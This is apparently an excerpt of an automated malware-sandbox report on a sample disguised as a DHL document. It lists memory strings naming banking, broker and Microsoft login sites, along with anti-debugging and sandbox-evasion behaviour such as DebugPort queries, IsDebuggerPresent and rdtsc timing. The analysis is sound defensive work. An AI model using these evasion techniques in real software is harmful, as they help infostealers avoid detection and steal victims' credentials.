Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: F56GKLK7U4.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: F56GKLK7U4.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ers - GDCDYNVMware20,1168
Source: F56GKLK7U4.10.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: F56GKLK7U4.10.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231^
Source: F56GKLK7U4.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rokers - EU WestVMware20,11696492231n
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CentralVMware20,116964922q
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: date_modifiedINTEGER CentralVMware20,116964922q
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: F56GKLK7U4.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231j
Source: DHL-DOC83972025-1.exe, 00000000.00000002.1268176994.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A1KvmCiZKdUEI0cVB_M@JA
Source: F56GKLK7U4.10.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 0000000E.00000002.1792670123.000001C929CEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3721321317.00000000009AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,116
Source: F56GKLK7U4.10.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: F56GKLK7U4.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: F56GKLK7U4.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,116`
Source: F56GKLK7U4.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: F56GKLK7U4.10.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: look.office.comVMware20,11696492231s
Source: F56GKLK7U4.10.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x.intuit.comVMware20,116l
Source: F56GKLK7U4.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: F56GKLK7U4.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: netbtugc.exe, 0000000A.00000002.3727139703.0000000007957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696
Source: F56GKLK7U4.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: F56GKLK7U4.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_003C7823 LdrLoadDll,

2_2_003C7823

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0046EAA2 BlockInput,

0_2_0046EAA2

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00422622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00422622

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_003F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003F42DE

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00414CE8 mov eax, dword ptr fs:[00000030h]	0_2_00414CE8
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_01187380 mov eax, dword ptr fs:[00000030h]	0_2_01187380
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_011873E0 mov eax, dword ptr fs:[00000030h]	0_2_011873E0
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_01185D50 mov eax, dword ptr fs:[00000030h]	0_2_01185D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
